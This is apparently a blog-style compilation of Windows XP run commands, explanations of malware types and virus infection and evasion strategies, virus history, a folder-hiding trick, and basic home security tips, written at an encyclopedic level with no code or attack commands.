103.WRITE.EXE - WordPad
104.WSCRIPT.EXE - Windows Script Host Settings
105.WUPDMGR.EXE - Windows UpdateThe following are Control Panel applets that can be run from the run line.They are located in the c:\windows\system32 directory, and have the file typeextension ".CPL".
106.ACCESS.CPL - Accessibility Options
107.APPWIZ.CPL - Add or Remove Programs
108.DESK.CPL - Display Properties
109.HDWWIZ.CPL - Add Hardware Wizard
110.INETCPL.CPL - Internet Explorer Properties
111.INTL.CPL - Regional and Language Options
112.JOY.CPL - Game Controllers
113.MAIN.CPL - Mouse Properties
114.MMSYS.CPL - Sounds and Audio Device Properties
115.NCPA.CPL - Network Connections
116.NUSRMGR.CPL - User Accounts
117.ODBCCP32.CPL - ODBC Data Source Administrator
118.POWERCFG.CPL - Power Options Properties
119.SYSDM.CPL - System Properties
120.TELEPHON.CPL - Phone and Modem Options
121.TIMEDATE.CPL - Date and Time Properties
The following are Microsoft Management Console Snap-ins that can be opened fromthe run line. These applications have the file type extension ".MSC".
122.CERTMGR.MSC - Certificates
123.CIADV.MSC - Indexing Service
124.COMPMGMT.MSC - Computer Management
125.DEVMGMT.MSC - Device Manager
126.DFRG.MSC - Disk Defragmenter
127.DISKMGMT.MSC - Disk Management
128.EVENTVWR.MSC - Event Viewer
129.FSMGMT.MSC - Shared Folders
130.LUSRMGR.MSC - Local Users and Groups
131.NTMSMGR.MSC - Removable Storage
132.NTMSOPRQ.MSC - Removable Storage Operator Requests
133.PERFMON.MSC - Performance Monitor
134.SERVICES.MSC - Services
135.WMIMGMT.MSC - Windows Management Infrastructure
These are the Commands in windows Xp-pro.Some of the commands will not work in other version .

How Does A Virus Work

Executable Virus

As the name suggests, this virus works by infecting executable files. Executables generally included files with extensions of .vbs, .exe, .com, .sys, .dll, .bat, .reg, and others. DO NOT OPEN ANY OF THESE FILES UNLESS YOU KNOW THE PERSON AND HAVE VIRUS SCANNED THE FILE! Another area that the executable virus looks to infect is the boot sector of either a hard disk or a floppy disk.In order for an executable virus to do any damage, it must first be loaded into the computer's memory. It accomplishes this as follows:

Attaches itself to an executable file, thereby infecting it.Sits on that executable file, going unnoticed, while waiting for you to execute that file.Once the infected file is executed, the virus is executed itself. That is, the virus is loaded into the computer's memory.Once in memory, the virus program can operate, carrying out the instructions of the progammer.

An executable virus may attach to the boot sector of a hard disk or floppy disk. This boot sector virus is much more serious than other viruses since it loads automatically into memory and can begin working each time you start your computer. Macro VirusA macro virus is a virus that needs another computer program before it can operate. Generally, you will only find Macro viruses infecting Microsoft Word and Excel. This is because these programs use a Visual Basic module for running their macros.When the virus attacks the Word or Excel document, it sits in the document and waits until you open the document with Word or Excel. Once you open the document, the macro runs, and the virus is now loaded into the computer's memory and can begin doing it's work.

Macro viruses,

such as the Word Macro Virus, often infect more than the document. Word has a set of templates, (.dot files), that it uses. The most common file is normal.dot. A Word Macro Virus will often not only infect the document you are working on, but will try to infect Word's Normal template as well. This insures two things:

Any document created within that template will be infected.Any infected documents that are opened on other (non-infected) computers will infect those computers as well.If your computer ever asks you to save change to the Normal.dot template say No and stop using that file!!!

Difference between Virus, Spyware,Adware

Difference between Virus, Spyware,Adware.

Computer Virus:-

Virus is a program or piece of code that is loaded onto your computer without your knowledge and runs against your wishes. Viruses can also replicate themselves. All computer viruses are manmade. A simple virus that can make a copy of itself over and over again is relatively easy to produce. Even such a simple virus is dangerous because it will quickly use all available memory and bring the system to a halt. An even more dangerous type of virus is one capable of transmitting itself across networks and bypassing security systems.Since 1987, when a virus infected ARPANET, a large network used by the Defense Department and many universities, many antivirus programs have become available. These programs periodically check your computer system for the best-known types of viruses.Some people distinguish between general viruses and worms. A worm is a special type of virus that can replicate itself and use memory, but cannot attach itself to other programs.

Spyware:-

Any software that covertly gathers user information through the user's Internet connection without his or her knowledge, usually for advertising purposes. Spyware applications are typically bundled as a hidden component of freeware or shareware programs that can be downloaded from the Internet; however, it should be noted that the majority of shareware and freeware applications do not come with spyware. Once installed, the spyware monitors user activity on the Internet and transmits that information in the background to someone else. Spyware can also gather information about e-mail addresses and even passwords and credit card numbers.
Spyware is similar to a Trojan horse in that users unwittingly install the product when they install something else. A common way to become a victim of spyware is to download certain peer-to-peer file swapping products that are available today.

Adware:-

Any software application in which advertising banners are displayed while the program is running. The authors of these applications include additional code that delivers the ads, which can be viewed through pop-up windows or through a bar that appears on a computer screen. The justification for adware is that it helps recover programming development cost and helps to hold down the cost for the user.Adware has been criticized because it usually includes code that tracks a user's personal information and passes it on to third parties, without the user's authorization or knowledge. This practice has been dubbed spyware and has prompted an outcry from computer security and privacy advocates, including the Electronic Privacy Information Center

Trojan Horse:-

A destructive program that masquerades as a benign application. Unlike viruses, Trojan horses do not replicate themselves but they can be just as destructive. One of the most insidious types of Trojan horse is a program that claims to rid your computer of viruses but instead introduces viruses onto your computer.The term comes from the a Greek story of the Trojan War, in which the Greeks give a giant wooden horse to their foes, the Trojans, ostensibly as a peace offering. But after the Trojans drag the horse inside their city walls, Greek soldiers sneak out of the horse's hollow belly and open the city gates, allowing their compatriots to pour in and capture Troy.

Computer Worm:-

A computer worm is a self-replicating computer program, similar to a computer virus. A virus attaches itself to, and becomes part of, another executable program; a worm is self-contained and does not need to be part of another program to propagate itself.The name 'worm' was taken from The Shockwave Rider, a 1970s science fiction novel by John Brunner. Researchers writing an early paper on experiments in distributed computing noted the similarities between their software and the program described by Brunner and adopted the name.
The first worm to attract wide attention, the Morris worm, was written by Robert Tappan Morris, Jr. at the MIT Artificial intelligence Laboratory. It was released on November 2, 1988, and quickly infected a great many computers on the Internet at the time. It propagated through a number of bugs in BSD Unix and its derivatives. Morris himself was convicted under the US Computer Crime and Abuse Act and received 3 years' probation, community service and a fine in excess of ,000.
In addition to replication, a worm may be designed to do any number of things, such as delete files on a host system or send documents via email. More recent worms may be multi-headed and carry other executables as a payload. However, even in the absence of such a payload, a worm can wreak havoc just with the network traffic generated by its reproduction. Mydoom, for example, caused a noticeable worldwide Internet slowdown at the peak of its spread.
A common payload is for a worm to install a backdoor in the infected computer, as was done by Sobig and Mydoom. These backdoors are used by spam senders for sending junk email or to cloak their website's address. BackdoorA program that allows a remote user to execute commands and tasks on your computer without your permission. These types of programs are typically used to launch attacks on other computers, distribute copyrighted software or media, or hack other computers.

Dialer:-

A program that typically dials a premium rate number that has per minute charges over and above the typical call charge. These calls are with the intent of gaining access to pornographic material.

Hijackers:-
A program that attempts to hijack certain Internet functions like redirecting your start page to the hijacker's own start page, redirecting search queries to a undesired search engine, or replace search results from popular search engines with their own information.

Hiding your folder in a different way!

Hiding your folder in a different way!

Method:1

1)Right Click on the desktop and Make a new folder2)Now rename the folder with a space(U have to hold ALT key and type 0160).3)Now u have a folder without a name.4)Right click on the folder>properties>customize. Click on change icon.5)Scroll a bit, u should find some empty spaces, Click on any one of them.click okThats it, now u can store ur personal data without any 3rd party tools.

Method:2

U can also hide ur folder by dis method:-open Start>Run>CMDnow type attrib +a +s +h C:/name of d folder u want to hide(Path of the Directory)Now even in the folder option Show all Hide folders is slected still u will get dis folder hide...Reason:-BeCause the directory will get the attribute of a system file.
To unhide 1.Type same command juzz put "-" instead of "+" .2.Go to Tools>>Folder Options>>View and uncheck the Hide Protected operating system files.

Virus Infection Strategies And Their Solution

Infection strategies:-

In order to replicate itself, a virus must be permitted to execute code and write to memory. For this reason, many viruses attach themselves to executable files that may be part of legitimate programs. If a user tries to start an infected program, the virus' code may be executed first. Viruses can be divided into two types, on the basis of their behavior when they are executed. Nonresident viruses immediately search for other hosts that can be infected, infect these targets, and finally transfer control to the application program they infected. Resident viruses do not search for hosts when they are started. Instead, a resident virus loads itself into memory on execution and transfers control to the host program. The virus stays active in the background and infects new hosts when those files are accessed by other programs or the operating system itself.
Nonresident viruses:-

Nonresident viruses can be thought of as consisting of a finder module and a replication module. The finder module is responsible for finding new files to infect. For each new executable file the finder module encounters, it calls the replication module to infect that file.
Resident viruses:-

Resident viruses contain a replication module that is similar to the one that is employed by nonresident viruses. However, this module is not called by a finder module. Instead, the virus loads the replication module into memory when it is executed and ensures that this module is executed each time the operating system is called to perform a certain operation. For example, the replication module can be called each time the operating system executes a file. In this case, the virus infects every suitable program that is executed on the computer.Resident viruses are sometimes subdivided into a category of fast infectors and a category of slow infectors. Fast infectors are designed to infect as many files as possible. For instance, a fast infector can infect every potential host file that is accessed. This poses a special problem to anti-virus software, since a virus scanner will access every potential host file on a computer when it performs a system-wide scan. If the virus scanner fails to notice that such a virus is present in memory, the virus can "piggy-back" on the virus scanner and in this way infect all files that are scanned. Fast infectors rely on their fast infection rate to spread. The disadvantage of this method is that infecting many files may make detection more likely, because the virus may slow down a computer or perform many suspicious actions that can be noticed by anti-virus software. Slow infectors, on the other hand, are designed to infect hosts infrequently. For instance, some slow infectors only infect files when they are copied. Slow infectors are designed to avoid detection by limiting their actions: they are less likely to slow down a computer noticeably, and will at most infrequently trigger anti-virus software that detects suspicious behavior by programs. The slow infector approach does not seem very successful, however.

Vectors and hosts:-

Viruses have targeted various types of transmission media or hosts. This list is not exhaustive:

1.Binary executable files (such as COM files and EXE files in MS-DOS, Portable Executable files in Microsoft Windows, and ELF files in Linux)

2.Volume Boot Records of floppy disks and hard disk partitions

3.The master boot record (MBR) of a hard disk

4.General-purpose script files (such as batch files in MS-DOS and Microsoft Windows, VBScript files, and shell script files on Unix-like platforms).

5.Application-specific script files (such as Telix-scripts)

6.Documents that can contain macros (such as Microsoft Word documents, Microsoft Excel spreadsheets, AmiPro documents, and Microsoft Access database files)

7.Cross-site scripting vulnerabilities in web applications

8.Arbitrary computer files. An exploitable buffer overflow, format string, race condition or other exploitable bug in a program which reads the file could be used to trigger the execution of code hidden within it. Most bugs of this type can be made more difficult to exploit in computer architectures with protection features such as an execute disable bit and/or address space layout randomization. PDFs, like HTML, may link to malicious code.[citation needed]
It is worth noting that some virus authors have written an .EXE extension on the end of .PNG (for example), hoping that users would stop at the trusted file type without noticing that the computer would start with the final type of file. (Many operating systems hide the extensions of known file types by default, so for example a filename ending in ".png.exe" would be shown ending in ".png".)

Methods to avoid detection:-

In order to avoid detection by users, some viruses employ different kinds of deception. Some old viruses, especially on the MS-DOS platform, make sure that the "last modified" date of a host file stays the same when the file is infected by the virus. This approach does not fool anti-virus software, however, especially that which maintains and dates Cyclic redundancy check on file changes.
Some viruses can infect files without increasing their sizes or damaging the files. They accomplish this by overwriting unused areas of executable files. These are called cavity viruses. For example the CIH virus, or Chernobyl Virus, infects Portable Executable files. Because those files had many empty gaps, the virus, which was 1 KB in length, did not add to the size of the file.
Some viruses try to avoid detection by killing the tasks associated with antivirus software before it can detect them.
As computers and operating systems grow larger and more complex, old hiding techniques need to be updated or replaced. Defending a computer against viruses may demand that a file system migrate towards detailed and explicit permission for every kind of file access.

Avoiding bait files and other undesirable hosts:-
A virus needs to infect hosts in order to spread further. In some cases, it might be a bad idea to infect a host program. For example, many anti-virus programs perform an integrity check of their own code. Infecting such programs will therefore increase the likelihood that the virus is detected. For this reason, some viruses are programmed not to infect programs that are known to be part of anti-virus software. Another type of host that viruses sometimes avoid is bait files. Bait files (or goat files) are files that are specially created by anti-virus software, or by anti-virus professionals themselves, to be infected by a virus. These files can be created for various reasons, all of which are related to the detection of the virus:
1.Anti-virus professionals can use bait files to take a sample of a virus (i.e. a copy of a program file that is infected by the virus). It is more practical to store and exchange a small, infected bait file, than to exchange a large application program that has been infected by the virus.

2.Anti-virus professionals can use bait files to study the behavior of a virus and evaluate detection methods. This is especially useful when the virus is polymorphic. In this case, the virus can be made to infect a large number of bait files. The infected files can be used to test whether a virus scanner detects all versions of the virus.

3.Some anti-virus software employs bait files that are accessed regularly. When these files are modified, the anti-virus software warns the user that a virus is probably active on the system. Since bait files are used to detect the virus, or to make detection possible, a virus can benefit from not infecting them. Viruses typically do this by avoiding suspicious programs, such as small program files or programs that contain certain patterns of 'garbage instructions'.
A related strategy to make baiting difficult is sparse infection. Sometimes, sparse infectors do not infect a host file that would be a suitable candidate for infection in other circumstances. For example, a virus can decide on a random basis whether to infect a file or not, or a virus can only infect host files on particular days of the week.

Stealth:-
Some viruses try to trick anti-virus software by intercepting its requests to the operating system. A virus can hide itself by intercepting the anti-virus software’s request to read the file and passing the request to the virus, instead of the OS. The virus can then return an uninfected version of the file to the anti-virus software, so that it seems that the file is "clean". Modern anti-virus software employs various techniques to counter stealth mechanisms of viruses. The only completely reliable method to avoid stealth is to boot from a medium that is known to be clean

Self-modification:-
Most modern antivirus programs try to find virus-patterns inside ordinary programs by scanning them for so-called virus signatures. A signature is a characteristic byte-pattern that is part of a certain virus or family of viruses. If a virus scanner finds such a pattern in a file, it notifies the user that the file is infected. The user can then delete, or (in some cases) "clean" or "heal" the infected file. Some viruses employ techniques that make detection by means of signatures difficult but probably not impossible. These viruses modify their code on each infection. That is, each infected file contains a different variant of the virus.

Encryption with a variable key:-
A more advanced method is the use of simple encryption to encipher the virus. In this case, the virus consists of a small decrypting module and an encrypted copy of the virus code. If the virus is encrypted with a different key for each infected file, the only part of the virus that remains constant is the decrypting module, which would (for example) be appended to the end. In this case, a virus scanner cannot directly detect the virus using signatures, but it can still detect the decrypting module, which still makes indirect detection of the virus possible. Since these would be symmetric keys, stored on the infected host, it is in fact entirely possible to decrypt the final virus, but that probably isn't required, since self-modifying code is such a rarity that it may be reason for virus scanners to at least flag the file as suspicious.
An old, but compact, encryption involves XORing each byte in a virus with a constant, so that the exclusive-or operation had only to be repeated for decryption. It is suspicious code that modifies itself, so the code to do the encryption/decryption may be part of the signature in many virus definitions.
Polymorphic code:-
Polymorphic code was the first technique that posed a serious threat to virus scanners. Just like regular encrypted viruses, a polymorphic virus infects files with an encrypted copy of itself, which is decoded by a decryption module. In the case of polymorphic viruses however, this decryption module is also modified on each infection. A well-written polymorphic virus therefore has no parts which remain identical between infections, making it very difficult to detect directly using signatures. Anti-virus software can detect it by decrypting the viruses using an emulator, or by statistical pattern analysis of the encrypted virus body. To enable polymorphic code, the virus has to have a polymorphic engine (also called mutating engine or mutation engine) somewhere in its encrypted body. See Polymorphic code for technical detail on how such engines operate.
Some viruses employ polymorphic code in a way that constrains the mutation rate of the virus significantly. For example, a virus can be programmed to mutate only slightly over time, or it can be programmed to refrain from mutating when it infects a file on a computer that already contains copies of the virus. The advantage of using such slow polymorphic code is that it makes it more difficult for anti-virus professionals to obtain representative samples of the virus, because bait files that are infected in one run will typically contain identical or similar samples of the virus. This will make it more likely that the detection by the virus scanner will be unreliable, and that some instances of the virus may be able to avoid detection.
Metamorphic code:-
To avoid being detected by emulation, some viruses rewrite themselves completely each time they are to infect new executables. Viruses that use this technique are said to be metamorphic. To enable metamorphism, a metamorphic engine is needed. A metamorphic virus is usually very large and complex. For example, W32/Simile consisted of over 14000 lines of Assembly language code, 90% of which is part of the metamorphic engine.
Vulnerability and countermeasures
The vulnerability of operating systems to viruses
Just as genetic diversity in a population decreases the chance of a single disease wiping out a population, the diversity of software systems on a network similarly limits the destructive potential of viruses.
This became a particular concern in the 1990s, when Microsoft gained market dominance in desktop operating systems and office suites. The users of Microsoft software (especially networking software such as Microsoft Outlook and Internet Explorer) are especially vulnerable to the spread of viruses. Microsoft software is targeted by virus writers due to their desktop dominance, and is often criticized for including many errors and holes for virus writers to exploit. Integrated applications (such as Microsoft Office) and applications with scripting languages with access to the file system (for example Visual Basic Script (VBS), and applications with networking features) are also particularly vulnerable.
Although Windows is by far the most popular operating system for virus writers, some viruses also exist on other platforms. Any operating system that allows third-party programs to run can theoretically run viruses. Some operating systems are less secure than others. Unix-based OS's (and NTFS-aware applications on Windows NT based platforms) only allow their users to run executables within their protected space in their own directories.
An Internet based research revealed that there were cases when people willingly pressed a particular button to download a virus. A security firm F-Secure ran a half year advertising campaign on Google AdWords which said "Is your PC virus-free? Get it infected here!". The result was 409 clicks.
As of 2006, there are relatively few security exploits targeting Mac OS X (with a Unix-based file system and kernel). The number of viruses for the older Apple operating systems, known as Mac OS Classic, varies greatly from source to source, with Apple stating that there are only four known viruses, and independent sources stating there are as many as 63 viruses. It is safe to say that Macs are less likely to be targeted because of low market share and thus a Mac-specific virus could only infect a small proportion of computers (making the effort less desirable). Virus vulnerability between Macs and Windows is a chief selling point, one that Apple uses in their Get a Mac advertising. That said, Macs have also had security issues just as Microsoft Windows has, though none have ever been fully taken advantage of successfully in the wild.
Windows and Unix have similar scripting abilities, but while Unix natively blocks normal users from having access to make changes to the operating system environment, older copies of Windows such as Windows 95 and 98 do not. In 1997, when a virus for Linux was released – known as "Bliss" – leading antivirus vendors issued warnings that Unix-like systems could fall prey to viruses just like Windows. The Bliss virus may be considered characteristic of viruses – as opposed to worms – on Unix systems. Bliss requires that the user run it explicitly (so it is a trojan), and it can only infect programs that the user has the access to modify. Unlike Windows users, most Unix users do not log in as an administrator user except to install or configure software; as a result, even if a user ran the virus, it could not harm their operating system. The Bliss virus never became widespread, and remains chiefly a research curiosity. Its creator later posted the source code to Usenet, allowing researchers to see how it worked.

The role of software development:-

Because software is often designed with security features to prevent unauthorized use of system resources, many viruses must exploit software bugs in a system or application to spread. Software development strategies that produce large numbers of bugs will generally also produce potential exploits.

Anti-virus software and other preventive measures:-

Many users install anti-virus software that can detect and eliminate known viruses after the computer downloads or runs the executable. There are two common methods that an anti-virus software application uses to detect viruses. The first, and by far the most common method of virus detection is using a list of virus signature definitions. This works by examining the content of the computer's memory (its RAM, and boot sectors) and the files stored on fixed or removable drives (hard drives, floppy drives), and comparing those files against a database of known virus "signatures". The disadvantage of this detection method is that users are only protected from viruses that pre-date their last virus definition update. The second method is to use a heuristic algorithm to find viruses based on common behaviors. This method has the ability to detect viruses that anti-virus security firms have yet to create a signature for.
Some anti-virus programs are able to scan opened files in addition to sent and received e-mails 'on the fly' in a similar manner. This practice is known as "on-access scanning." Anti-virus software does not change the underlying capability of host software to transmit viruses. Users must update their software regularly to patch security holes. Anti-virus software also needs to be regularly updated in order to prevent the latest threats.
One may also prevent the damage done by viruses by making regular backups of data (and the Operating Systems) on different media, that are either kept unconnected to the system (most of the time), read-only or not accessible for other reasons, such as using different file systems. This way, if data is lost through a virus, one can start again using the backup (which should preferably be recent). If a backup session on optical media like CD and DVD is closed, it becomes read-only and can no longer be affected by a virus. Likewise, an Operating System on a bootable can be used to start the computer if the installed Operating Systems become unusable. Another method is to use different Operating Systems on different file systems. A virus is not likely to affect both. Data backups can also be put on different file systems. For example, Linux requires specific software to write to NTFS partitions, so if one does not install such software and uses a separate installation of MS Windows to make the backups on an NTFS partition, the backup should remain safe from any Linux viruses. Likewise, MS Windows can not read file systems like ext3, so if one normally uses MS Windows, the backups can be made on an ext3 partition using a Linux installation.

Recovery methods:-

Once a computer has been compromised by a virus, it is usually unsafe to continue using the same computer without completely reinstalling the operating system. However, there are a number of recovery options that exist after a computer has a virus. These actions depend on severity of the type of Virus.

Virus removal:-
One possibility on Windows XP and Windows Vista is a tool known as System Restore, which restores the registry and critical system files to a previous checkpoint. Often a virus will cause a system to hang, and a subsequent hard reboot will render a system restore point from the same day corrupt. Restore points from previous days should work provided the virus is not designed to corrupt the restore files. Some viruses, however, disable system restore and other important tools such as Task Manager and Command Prompt. An example of a virus that does this is CiaDoor.
Administrators have the option to disable such tools from limited users for various reasons. The virus modifies the registry to do the same, except, when the Administrator is controlling the computer, it blocks all users from accessing the tools. When an infected tool activates it gives the message "Task Manager has been disabled by your administrator.", even if the user trying to open the program is the administrator.
If your system is a Microsoft product and you have your 20 digit registration number, you can go to the Microsoft web site, and they will do a free scan and most likely remove any known virus such as Trojan win32.murlo.

Operating system reinstallation:-

Reinstalling the operating system is another approach to virus removal. It involves simply reformatting the OS partition and installing the OS from its original media, or imaging the partition with a clean backup image (taken with Ghost or Acronis for example).
This method has the benefits of being simple to do, can be faster than running multiple anti-virus scans, and is guaranteed to remove any malware. Downsides include having to reinstall all other software as well as the operating system. User data can be backed up by booting off of a LiveCD or putting the hard drive into another computer and booting from the other computer's operating system.

Computer Virus

Introduction:-

A computer virus is a computer program that can copy itself and infect a computer without permission or knowledge of the user. However, the term "virus" is commonly used, albeit erroneously, to refer to many different types of malware programs. The original virus may modify the copies, or the copies may modify themselves, as occurs in a metamorphic virus. A virus can only spread from one computer to another when its host is taken to the uninfected computer, for instance by a user sending it over a network or the Internet, or by carrying it on a removable medium such as a floppy disk, CD, or USB drive. Meanwhile viruses can spread to other computers by infecting files on a network file system or a file system that is accessed by another computer. Viruses are sometimes confused with computer worms and Trojan horses. A worm can spread itself to other computers without needing to be transferred as part of a host, and a Trojan horse is a file that appears harmless. Both worms and Trojans will cause harm to computers when executed.Most personal computers are now connected to the Internet and to local area networks, facilitating the spread of malicious code. Today's viruses may also take advantage of network services such as the World Wide Web, e-mail, Instant Messaging and file sharing systems to spread, blurring the line between viruses and worms. Furthermore, some sources use an alternative terminology in which a virus is any form of self-replicating malware.
Some viruses are programmed to damage the computer by damaging programs, deleting files, or reformatting the hard disk. Others are not designed to do any damage, but simply replicate themselves and perhaps make their presence known by presenting text, video, or audio messages. Even these benign viruses can create problems for the computer user. They typically take up computer memory used by legitimate programs. As a result, they often cause erratic behavior and can result in system crashes. In addition, many viruses are bug-ridden, and these bugs may lead to system crashes and data loss.

History:-

The Creeper virus was first detected on ARPANET, the forerunner of the Internet in the early 1970s.It propagated via the TENEX operating system and could make use of any connected modem to dial out to remote computers and infect them. It would display the message "I'M THE CREEPER : CATCH ME IF YOU CAN.". It is rumored that the Reaper program, which appeared shortly after and sought out copies of the Creeper and deleted them, may have been written by the creator of the Creeper in a fit of regret.

A program called "Rother J" is commonly credited[attribution needed] with being the first computer virus to appear "in the wild" — that is, outside the single computer or lab where it was created, but that claim is false. See the Timeline of notable computer viruses and worms for other earlier viruses. It was however the first virus to infect computers "in the home". Written in 1982 by Richard Skrenta, it attached itself to the Apple DOS 3.3 operating system and spread by floppy disk.This virus was originally a joke, created by a high school student and put onto a game. The disk could only be used 49 times. The game was set to play, but release the virus on the 50th time of starting the game. Only this time, instead of playing the game, it would change to a blank screen that read a message about the virus named Elk Cloner. The message that showed up on the screen is as follows:"Elk Cloner: The program with a personality It will get on all your disksIt will infiltrate your chipsYes it's Cloner!It will stick to you like glueIt will modify RAM tooSend in the Cloner!"The computer would then be infected.
The first PC virus in the wild was a boot sector virus called Brain, created in 1986 by the Farooq Alvi Brothers, operating out of Lahore, Pakistan. The brothers reportedly created the virus to deter pirated copies of software they had written. However, analysts have claimed that the Ashar virus, a variant of Brain, possibly predated it based on code within the virus.
Before computer networks became widespread, most viruses spread on removable media, particularly floppy disks. In the early days of the personal computer, many users regularly exchanged information and programs on floppies. Some viruses spread by infecting programs stored on these disks, while others installed themselves into the disk boot sector, ensuring that they would be run when the user booted the computer from the disk.
Traditional computer viruses emerged in the 1980s, driven by the spread of personal computers and the resultant increase in BBS and modem use, and software sharing. Bulletin board driven software sharing contributed directly to the spread of Trojan horse programs, and viruses were written to infect popularly traded software. Shareware and bootleg software were equally common vectors for viruses on BBS's. Within the "pirate scene" of hobbyists trading illicit copies of retail software, traders in a hurry to obtain the latest applications and games were easy targets for viruses.
Since the mid-1990s, macro viruses have become common. Most of these viruses are written in the scripting languages for Microsoft programs such as Word and Excel. These viruses spread in Microsoft Office by infecting documents and spreadsheets. Since Word and Excel were also available for Mac OS, most of these viruses were able to spread on Macintosh computers as well. Most of these viruses did not have the ability to send infected e-mail. Those viruses which did spread through e-mail took advantage of the Microsoft Outlook COM interface.
Macro viruses pose unique problems for detection software. For example, some versions of Microsoft Word allowed macros to replicate themselves with additional blank lines. The virus behaved identically but would be misidentified as a new virus. In another example, if two macro viruses simultaneously infect a document, the combination of the two, if also self-replicating, can appear as a "mating" of the two and would likely be detected as a virus unique from the "parents".
A virus may also send a web address link as an instant message to all the contacts on an infected machine. If the recipient, thinking the link is from a friend (a trusted source) follows the link to the website, the virus hosted at the site may be able to infect this new computer and continue propagating.The newest species of the virus family is the cross-site scripting virus[citation needed]. The virus emerged from research and was academically demonstrated in 2005.[5] This virus utilizes cross-site scripting vulnerabilities to propagate. Since 2005 there have been multiple instances of the cross-site scripting viruses in the wild, most notable sites affected have been MySpace and Yahoo.

10 Fast and Free Security Enhancements

10 Fast and Free Security Enhancements
Before you spend a dime on security, there are many precautions you can take that will protect you against the most common threats.
1. Check Windows Update and Office Update regularly (_http://office.microsoft.com/productupdates); have your Office CD ready. Windows Me, 2000, and XP users can configure automatic updates. Click on the Automatic Updates tab in the System control panel and choose the appropriate options.
2. Install a personal firewall. Both SyGate (_www.sygate.com) and ZoneAlarm (_www.zonelabs.com) offer free versions.
3. Install a free spyware blocker. Our Editors' Choice ("Spyware," April 22) was SpyBot Search & Destroy (_http://security.kolla.de). SpyBot is also paranoid and ruthless in hunting out tracking cookies.
4. Block pop-up spam messages in Windows NT, 2000, or XP by disabling the Windows Messenger service (this is unrelated to the instant messaging program). Open Control Panel Administrative Tools Services and you'll see Messenger. Right-click and go to Properties. Set Start-up Type to Disabled and press the Stop button. Bye-bye, spam pop-ups! Any good firewall will also stop them.5. Use strong passwords and change them periodically. Passwords should have at least seven characters; use letters and numbers and have at least one symbol. A decent example would be f8izKro@l. This will make it much harder for anyone to gain access to your accounts.
6. If you're using Outlook or Outlook Express, use the current version or one with the Outlook Security Update installed. The update and current versions patch numerous vulnerabilities.7. Buy antivirus software and keep it up to date. If you're not willing to pay, try Grisoft AVG Free Edition (Grisoft Inc., w*w.grisoft.com). And doublecheck your AV with the free, online-only scanners available at w*w.pandasoftware.com/activescan and _http://housecall.trendmicro.com. 8. If you have a wireless network, turn on the security features: Use MAC filtering, turn off SSID broadcast, and even use WEP with the biggest key you can get. For more, check out our wireless section or see the expanded coverage in Your Unwired World in our next issue.
9. Join a respectable e-mail security list, such as the one found at our own Security Supersite at _http://security.ziffdavis.com, so that you learn about emerging threats quickly and can take proper precautions.
10. Be skeptical of things on the Internet. Don't assume that e-mail "From:" a particular person is actually from that person until you have further reason to believe it's that person. Don't assume that an attachment is what it says it is. Don't give out your password to anyone, even if that person claims to be from "support."